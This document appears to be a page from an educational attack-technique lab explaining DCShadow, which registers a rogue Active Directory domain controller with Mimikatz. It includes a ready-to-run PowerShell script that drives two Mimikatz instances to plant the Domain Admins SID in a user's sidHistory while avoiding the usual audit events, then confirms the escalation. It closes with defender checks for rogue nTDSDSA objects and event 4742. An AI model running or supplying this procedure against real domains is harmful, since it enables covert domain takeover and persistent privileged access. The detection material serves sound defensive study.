
DCShadow

Register a Rogue Domain Controller

Temporarily register a rogue Domain Controller in Active Directory, push malicious changes to the real DCs through legitimate DRS replication, and leave few of the usual directory-modification audit events behind, because the change arrives as replicated data rather than as an LDAP write.

Difficulty: Advanced | Duration: ~6 min | MITRE ATT&CK: T1207

Prerequisites:
- Domain Admin or equivalent rights (needed to create the rogue DC's server and nTDSDSA objects in the Configuration partition and to trigger replication)
- Two Mimikatz instances: one running as SYSTEM on the rogue host to act as the replication server, one running with Domain Admin rights to trigger the push
- Network access from the rogue host to a real Domain Controller (RPC for the DRS calls)
Step 1/4: Start Mimikatz DCShadow and register the rogue DC

[Terminal 1] mimikatz #

Step 1: Prepare Malicious Changes

The first Mimikatz instance defines the changes to push. Here we add the Domain Admins SID (the domain SID with RID 512) to a user's sidHistory attribute. sidHistory is honored when the user's access token is built at logon, so the account gets Domain Admin access without ever appearing in the group's member list. This attribute is system-protected and cannot be set through a normal LDAP write; a change that arrives through replication is accepted without that check, which is why DCShadow is used for it.

In plain terms: we are preparing a fake Domain Controller that will push a single change, giving "targetuser" the same access as a Domain Admin by injecting a special attribute. This is like preparing a counterfeit authorization letter and then having the real office file it as if it had issued it.
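The two-terminal procedure above as an added PowerShell example, not code from the original page or from the Mimikatz project. It drives the two Mimikatz instances from one elevated shell, verifies that the sidHistory change arrived on the real DC, and then shows the checks a defender would run against the same activity. Everything specific is assumed: the rogue host is WS01, the real DC is DC01, the user is "targetuser", mimikatz.exe sits in the current directory, the RSAT ActiveDirectory module is installed, and the shell already runs elevated under a Domain Admin account.

```powershell
# Added example (not the page's or Mimikatz's own code). Assumed environment:
# rogue host WS01, real DC DC01, user "targetuser", mimikatz.exe in the current
# directory, RSAT ActiveDirectory module present, shell elevated as a Domain Admin.
Import-Module ActiveDirectory

$TargetUser = 'targetuser'
# Resolve the Domain Admins SID rather than typing it; RID 512 is Domain Admins.
$DaSid = (Get-ADGroup -Identity 'Domain Admins').SID.Value   # S-1-5-21-<domain>-512

# --- Terminal 1: rogue DC, must run as SYSTEM ----------------------------------
# "!+" loads the mimikatz driver and "!processtoken" replaces the process token with
# SYSTEM's. The dcshadow command then registers WS01 as a DC (server + nTDSDSA
# objects, DRS SPNs on the computer account) and starts the RPC server that will
# answer DC01's replication request. No "exit": it must stay up until the push.
$Stage  = "lsadump::dcshadow /object:$TargetUser /attribute:sidHistory /value:$DaSid"
$Server = Start-Process -FilePath '.\mimikatz.exe' -PassThru `
    -ArgumentList 'privilege::debug', '!+', '!processtoken', "`"$Stage`""
Start-Sleep -Seconds 5   # give the rogue DC time to publish its objects

# --- Terminal 2: trigger replication with Domain Admin rights -------------------
# /push asks the real DC to replicate from the rogue one, then removes the rogue
# DC's registration again.
& '.\mimikatz.exe' 'lsadump::dcshadow /push' 'exit'
Wait-Process -Id $Server.Id -Timeout 60 -ErrorAction SilentlyContinue

# --- Verify the change landed on the real DC via replication -------------------
$user = Get-ADUser -Identity $TargetUser -Properties sidHistory
if ($user.sidHistory.Value -contains $DaSid) {
    "$TargetUser now carries $DaSid in sidHistory (effective at next logon)"
}

# --- Defender's view 1: nTDSDSA objects that belong to no real DC ----------------
# A push is impossible without an nTDSDSA object under CN=Sites in the
# Configuration partition. Mimikatz deletes it after the push, so this check only
# catches a rogue DC that is currently registered.
$cfgNc   = (Get-ADRootDSE).configurationNamingContext
$realDcs = (Get-ADDomainController -Filter *).Name
Get-ADObject -LDAPFilter '(objectClass=nTDSDSA)' -SearchBase "CN=Sites,$cfgNc" |
    ForEach-Object { (($_.DistinguishedName -split ',')[1] -replace '^CN=', '') } |
    Where-Object   { $_ -notin $realDcs } |
    ForEach-Object { "Suspicious DSA object for non-DC server: $_" }

# --- Defender's view 2: the SPN change survives the cleanup -----------------------
# Registering the rogue DC adds the DRS replication SPN (class GUID
# E3514235-4B06-11D1-AB04-00C04FC2DCD2) to WS01's computer account. DC01 logs that
# as event 4742 (computer account changed), and the later removal is logged too.
Get-WinEvent -ComputerName 'DC01' -MaxEvents 500 `
    -FilterHashtable @{ LogName = 'Security'; Id = 4742 } |
    Where-Object   { $_.Message -match 'E3514235-4B06-11D1-AB04-00C04FC2DCD2' } |
    Select-Object  TimeCreated, MachineName, Message
```

Run the first three sections on WS01; the two hunting sections are meant for the defender and only need a domain-joined host with read access to the Configuration partition and to DC01's Security log (event 4742 is part of the "Audit Computer Account Management" subcategory, which must be enabled on the DC). The sidHistory check is the attacker's confirmation that the push worked; the same one-liner is also the quickest way for a defender to find accounts whose sidHistory contains a privileged SID from their own domain, which has no legitimate reason to exist.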

Attack Flow (diagram): the Attacker (Domain Admin) queues changes on the Rogue DC (WS01); DC01 (the real DC) then replicates them from WS01. Legend: Request, Response, Attack, Data.

Source

Content sourced from Microsoft Documentation, MITRE ATT&CK Framework, NIST SP 800-63/171, adsecurity.org (Sean Metcalf), SpecterOps research, and SANS Reading Room. For educational purposes only.